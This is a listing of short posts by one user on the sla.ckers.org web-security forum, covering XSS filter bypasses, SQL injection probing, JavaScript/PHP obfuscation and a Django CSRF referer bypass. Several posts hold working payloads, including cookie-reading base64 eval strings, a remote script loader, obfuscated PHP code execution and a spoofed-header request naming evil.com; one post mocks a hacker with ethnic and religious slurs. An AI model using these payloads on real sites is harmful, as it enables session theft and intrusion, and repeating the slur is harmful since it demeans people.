Sla.ckers.org
Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixations, hijacking, lockout, replay, session riding, etc.

Results 1 - 30 of 164
6 months ago
barbarianbob
WOWIE!!!!!!!!!!!!!!!!!!!!
Forum: Projects
1 year ago
barbarianbob
*head flies back as I say "OH WOWW ! !"* Epic, bro, epic..
Forum: DoS
1 year ago
barbarianbob
1 year ago
barbarianbob
No I did not.
Forum: OMG Ponies
2 years ago
barbarianbob
Here's a fun little thing someone linked me to today: http://utf-8.jp/public/aaencode.html Input: alert("Hello, JavaScript") Output: ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー
Forum: Obfuscation
2 years ago
barbarianbob
<iframe src="//victim/vuln.php?injection=%3Cscript%3Elocation%3Dname%3B%3C%2Fscript%3E" name="javascript:alert(1)"></iframe>
Forum: XSS Info
2 years ago
barbarianbob
Hey Divine_Defender. It's me, Divine_Fire and I regret nothing!!
Forum: Intro
3 years ago
barbarianbob
<scrscriptipt>alert(1)</scrscriptipt>
Forum: XSS Info
3 years ago
barbarianbob
Not part of the new minification effort, but that bitwise stuff is really good for obfuscation. Ex: $create_function = '`pd`td_dtl`thll'|'cbaa`a_babc`acb'; $register_shutdown_function = 'pddhptdp_phttdltl_dtl`thll'|'bacac`ab_c`a``ccb_babc`acb'; $shell = 'var_dump(123);'; $register_shutdown_function($create_function('', $shell)); Here all the var names can be changed, but you can still
Forum: Obfuscation
3 years ago
barbarianbob
Yeah man. I'll help you find the download. First you have to
Forum: SQL and Code Injection
3 years ago
barbarianbob
It looks like they're treating blocks differently.
var y=123; { function y(){} }; y;
FF returns: function y() {}
GC returns: 123
Edit:
alert(z); { function z(){} }; alert(z);
//FF errors
//GC alerts "function z(){}" twice
var z=123; alert(z); { function z(){} }; alert(z);
//FF alerts "123", then "function z(){}"
//GC alerts "123" twice
Forum: Obfuscation
3 years ago
barbarianbob
No. Defacing is dumb.
Forum: OMG Ponies
3 years ago
barbarianbob
If you switch the eval() to a var_dump(), the output will contain the key. You can also paste the code you have, and I'll try helping decode it.
Forum: Obfuscation
3 years ago
barbarianbob
Then use this:
Forum: SQL and Code Injection
3 years ago
barbarianbob
Your closing tag in the document.write is terminating the script tag early. Split it up into a concatenation: <script>document.write("<script src\u003d'//qr.net/4ds'></scr"+"ipt>")</script>
Forum: XSS Info
3 years ago
barbarianbob
I'm looking at lines 145,146 of csrf.py
good_referer = 'https://%s/' % request.get_host()
if not same_origin(referer, good_referer):
And from the link I posted, the value for HTTP_X_FORWARDED_HOST overrides the real host. So instead of spoofing your referer to match the host, trick the host into thinking it's the referer:
POST / HTTP/1.1
host: good.com
referer: evil.com
X_FORWARDED_HOST: e
Forum: CSRF and Session Info
3 years ago
barbarianbob
Can you send http_x_* headers with just js?
Forum: CSRF and Session Info
3 years ago
barbarianbob
I got them both using blind injection. Are they also supposed to be doable without using blind, as in outputting the password in the list? edit: I'm guessing "No" Anyway, it's a nice challenge. It gets you looking later on in the query than usual, since most challenges deal with the WHERE clause.
Forum: SQL and Code Injection
3 years ago
barbarianbob
I got it :D As already mentioned, it's a really nice challenge because it requires you to look from a different angle.
Forum: XSS Info
3 years ago
barbarianbob
Excellent work, the_master
Forum: OMG Ponies
3 years ago
barbarianbob
Try a bunch of half injections to see what it 403s with:
www.site.com/?url=articles/category/union/
www.site.com/?url=articles/category/select/
www.site.com/?url=articles/category/union+select/
www.site.com/?url=articles/category/union+all+select/
www.site.com/?url=articles/category/union++++all++++select/
www.site.com/?url=articles/category/union+%23%0aselect/
etc.
Forum: SQL and Code Injection
3 years ago
barbarianbob
The 403 is probably happening from apache blocking characters in filenames. You can bypass that by using cakephp's alternate input format: www.site.com/?url=articles/category/6'blah I took a look at the current version of cakephp and it splits arguments by slashes (and all other characters are valid), so you can't do obfuscation with /* and */. But I also don't see any WAFs in the code, so you
Forum: SQL and Code Injection
3 years ago
barbarianbob
Do you have more than one place to add your input into the <script>, such as in the following?
<script>
var w = '<arg1>';
var x = '<arg2>';
</script>
If so, you can try ?arg1=asdf\&arg2=;alert(1);\
The first one will slash the endquote, keeping the string going, until it hits the second string, where it will close right before your second input.
Forum: XSS Info
4 years ago
barbarianbob
Genius muslim algrian hacker, TopSaT13, downloads a script to deface a single page on a website. Considers this an achievement. Thinks defacement isn't retarded and actually means something. Kills you by having sex with your server and your web because you killed his brothers.
Forum: SQL and Code Injection
4 years ago
barbarianbob
It builds html that tries to social engineer people. It says to click a "Like" button and a "Share" button to see it. It's built from javascript to obfuscate it, which is probably to avoid automatic reports. It's nothing malicious.
Forum: Obfuscation
4 years ago
barbarianbob
Oh, so this is pretty much non ."' try alert(eval(atob(/ZG9jdW1lbnQuY29va2ll/(/ZG9jdW1lbnQuY29va2ll/)))) and obfuscate future code using this var code='alert(123)';alert('eval(atob(/'+btoa(code)+'/(/'+btoa(code)+'/)))');
Forum: XSS Info
4 years ago
barbarianbob
addslashes/magic_quotes is breaking it alert(eval(atob(/ZG9jdW1lbnQuY29va2ll/.source)))
Forum: XSS Info
4 years ago
barbarianbob
I don't think this one's possible because of the strpos() validation which restricts \, /, and : You can't pass an array to error the strpos (i.e. ?file[]=123) because then you won't be able to do readfile(). I was initially expecting passing a data wrapper to obfuscate the file name in base64 would work. But although the data wrapper looks lenient in its construction ('data:::/;base64,SSBsb3ZlI
Forum: SQL and Code Injection
4 years ago
barbarianbob
It's passing the array key hxxp://falcon.biucentrax.com/biucentrax/?idwp=499d3ef755e464.08815780
Forum: SQL and Code Injection
4 years ago
barbarianbob
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2225 This links to Stefan Esser's twitter: http://twitter.com/i0n1c/statuses/16447867829 And POC output: http://pastebin.com/mXGidCsd Does anyone have more info on this? Because holy shit he has been saying to never unserialize input since forever ago but a ton of people still do.
Forum: SQL and Code Injection